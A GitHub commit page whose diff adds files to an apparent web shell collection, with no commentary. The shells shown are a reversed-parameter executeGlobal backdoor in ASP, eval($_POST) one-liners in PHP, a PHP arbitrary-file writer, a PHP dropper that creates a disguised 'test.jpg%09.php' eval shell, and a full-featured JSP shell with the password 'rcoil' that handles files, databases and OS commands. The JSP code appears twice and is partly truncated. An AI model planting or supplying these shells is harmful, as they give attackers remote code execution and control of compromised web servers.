modify

shadowliangliang · Apr 18, 2017 · c2fe064 · c2fe064
1 parent f9a6a40
commit c2fe064
Show file tree

Hide file tree

Showing 114 changed files with 1,838 additions and 4,893 deletions.
diff --git a/asp/658f33a1ad5b3db81f67f742b9236a4525be5e48.asp b/asp/658f33a1ad5b3db81f67f742b9236a4525be5e48.asp
@@ -0,0 +1 @@
+<%executeGlobal(StrReverse(Request(Chr(98))))%>
diff --git a/jsp/e564ca392f108addd7728966fdbdad98cfe5660e.jsp b/jsp/e564ca392f108addd7728966fdbdad98cfe5660e.jsp
@@ -0,0 +1 @@
+<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%><%!String Pwd="rcoil";String EC(String s,String c)throws Exception{return s;}Connection GC(String s)throws Exception{String[]x=s.trim().split("\r\n");Class.forName(x[0].trim()).newInstance();Connection c=DriverManager.getConnection(x[1].trim());if(x.length>2){c.setCatalog(x[2].trim())}return c}void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n)}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close()}void GG(String s,String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile();FileOutputStream os=new FileOutputStream(f);for(int i=0;i"+"|");if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb)}}else if(Z.equals("B")){BB(z1,sb)}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));while((l=br.readLine())!=null){sb.append(l+"\r\n")}br.close()}else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));bw.write(z2);bw.close();sb.append("1")}else if(Z.equals("E")){EE(z1);sb.append("1")}else if(Z.equals("F")){FF(z1,response)}else if(Z.equals("G")){GG(z1,z2);sb.append("1")}else if(Z.equals("H")){HH(z1,z2);sb.append("1")}else if(Z.equals("I")){II(z1,z2);sb.append("1")}else if(Z.equals("J")){JJ(z1);sb.append("1")}else if(Z.equals("K")){KK(z1,z2);sb.append("1")}else if(Z.equals("L")){LL(z1,z2);sb.append("1")}else if(Z.equals("M")){String[]c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c);MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb)}else if(Z.equals("N")){NN(z1,sb)}else if(Z.equals("O")){OO(z1,sb)}else if(Z.equals("P")){PP(z1,sb)}else if(Z.equals("Q")){QQ(cs,z1,z2,sb)}}catch(Exception e){sb.append("ERROR"+":// "+e.toString())}sb.append("|"+"<-");out.print(sb.toString());%>
diff --git a/...c4940f9c42b4758fcc9360b05fdff808e97c7.php → ...c4940f9c42b4758fcc9360b05fdff808e97c7.php b/...c4940f9c42b4758fcc9360b05fdff808e97c7.php → ...c4940f9c42b4758fcc9360b05fdff808e97c7.php
diff --git a/...366919af64bf743502605d570e2ecc3da996f.php → ...c366919af64bf743502605d570e2ecc3da996f.pl b/...366919af64bf743502605d570e2ecc3da996f.php → ...c366919af64bf743502605d570e2ecc3da996f.pl
diff --git a/...e1dd1528868428ef1374ac5216baaca6e2976.php → ...4e1dd1528868428ef1374ac5216baaca6e2976.pl b/...e1dd1528868428ef1374ac5216baaca6e2976.php → ...4e1dd1528868428ef1374ac5216baaca6e2976.pl
diff --git a/php/02c16caaca2d7ba33b9b50951de39fbba7105b65.php b/php/02c16caaca2d7ba33b9b50951de39fbba7105b65.php
diff --git a/php/0a8deb733b2e6530c906449092e53c3f48154082.php b/php/0a8deb733b2e6530c906449092e53c3f48154082.php
diff --git a/php/0ce760131787803bbef216d0ee9b5eb062633537.php b/php/0ce760131787803bbef216d0ee9b5eb062633537.php
@@ -0,0 +1,6 @@
+<?php 
+$f=realpath(dirname(__FILE__)."/../").$_POST["z1"]; //返回生成文件的路径
+$c=$_POST["z2"];$buf=""; //z2获取内容到变量c中,初始化变量buf
+for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2)); //计次循环,解码c提交上来的内容
+@fwrite(fopen($f,"w"),$buf); echo "1ok"; //生成文件
+?>
diff --git a/php/1031737bfda13ff2cdc30ba8e1ec785394ebd5ca.php b/php/1031737bfda13ff2cdc30ba8e1ec785394ebd5ca.php
diff --git a/php/118ef1fc3db5d228e8bef55af553bd463a890b67.php b/php/118ef1fc3db5d228e8bef55af553bd463a890b67.php
@@ -0,0 +1 @@
+<?eval($_POST['c']);?>
diff --git a/php/1776b25f6085b9b7082f84e8f7ddf4a049ef9cc3.php b/php/1776b25f6085b9b7082f84e8f7ddf4a049ef9cc3.php
diff --git a/php/17903a7e897102b3b59962a5b30398e3b4a871ad.php b/php/17903a7e897102b3b59962a5b30398e3b4a871ad.php
diff --git a/php/1904acaf8d4b29fe9fc1a2d383f89b28b53b0a4f.php b/php/1904acaf8d4b29fe9fc1a2d383f89b28b53b0a4f.php
diff --git a/php/1a2c92f120f86132a9f7a122ce19441dbe9661e9.php b/php/1a2c92f120f86132a9f7a122ce19441dbe9661e9.php
diff --git a/php/1a5a731d5390170ff298b473ce8016740cbb6634.php b/php/1a5a731d5390170ff298b473ce8016740cbb6634.php
diff --git a/php/1c2f9b1908529f190457c6a2ca8c7c979f1411ca.php b/php/1c2f9b1908529f190457c6a2ca8c7c979f1411ca.php
diff --git a/php/2119de8ac8ce213bf4fface463fe7e695c5eabaf.php b/php/2119de8ac8ce213bf4fface463fe7e695c5eabaf.php
diff --git a/php/223323d02a70d646f362eb9b544d2530990e6e83.php b/php/223323d02a70d646f362eb9b544d2530990e6e83.php
diff --git a/php/234e38c0a34eead883ecdf03b50dc497765cea70.php b/php/234e38c0a34eead883ecdf03b50dc497765cea70.php
diff --git a/php/31e31bb64f4db825eca3dd21519d5adba7ad9a3c.php b/php/31e31bb64f4db825eca3dd21519d5adba7ad9a3c.php
@@ -0,0 +1,5 @@
+<?php
+$webpath = dirname(__FILE__)."/";
+$a="<?php @eval("."$"."_POST"."[rcoil]);?>";
+file_put_contents($webpath ."test.jpg".chr(9).".php", $a);
+?>  //test.jpg%09.php
diff --git a/php/34a867da0fd4db899003038f69f7375e29882be2.php b/php/34a867da0fd4db899003038f69f7375e29882be2.php
diff --git a/php/37505b04bce145aac76fe26d560a938c675e431a.php b/php/37505b04bce145aac76fe26d560a938c675e431a.php
diff --git a/php/3ca32236c0859bee6680c05f662ad1f4f24b21a7.php b/php/3ca32236c0859bee6680c05f662ad1f4f24b21a7.php
diff --git a/php/3fa7e6f3566427196ac47551392e2386a038d61c.php b/php/3fa7e6f3566427196ac47551392e2386a038d61c.php
Original file line number	Diff line number	Diff line change
		@@ -0,0 +1 @@
		<%executeGlobal(StrReverse(Request(Chr(98))))%>
Original file line number	Diff line number	Diff line change
		@@ -0,0 +1 @@
		<%@page import="java.io.,java.util.,java.net.,java.sql.,java.text.*"%><%!String Pwd="rcoil";String EC(String s,String c)throws Exception{return s;}Connection GC(String s)throws Exception{String[]x=s.trim().split("\r\n");Class.forName(x[0].trim()).newInstance();Connection c=DriverManager.getConnection(x[1].trim());if(x.length>2){c.setCatalog(x[2].trim())}return c}void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i"+"\|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n)}os.write(("\|"+"<-").getBytes(),0,3);os.close();is.close()}void GG(String s,String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile();FileOutputStream os=new FileOutputStream(f);for(int i=0;i"+"\|");if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb)}}else if(Z.equals("B")){BB(z1,sb)}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));while((l=br.readLine())!=null){sb.append(l+"\r\n")}br.close()}else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));bw.write(z2);bw.close();sb.append("1")}else if(Z.equals("E")){EE(z1);sb.append("1")}else if(Z.equals("F")){FF(z1,response)}else if(Z.equals("G")){GG(z1,z2);sb.append("1")}else if(Z.equals("H")){HH(z1,z2);sb.append("1")}else if(Z.equals("I")){II(z1,z2);sb.append("1")}else if(Z.equals("J")){JJ(z1);sb.append("1")}else if(Z.equals("K")){KK(z1,z2);sb.append("1")}else if(Z.equals("L")){LL(z1,z2);sb.append("1")}else if(Z.equals("M")){String[]c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c);MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb)}else if(Z.equals("N")){NN(z1,sb)}else if(Z.equals("O")){OO(z1,sb)}else if(Z.equals("P")){PP(z1,sb)}else if(Z.equals("Q")){QQ(cs,z1,z2,sb)}}catch(Exception e){sb.append("ERROR"+":// "+e.toString())}sb.append("\|"+"<-");out.print(sb.toString());%>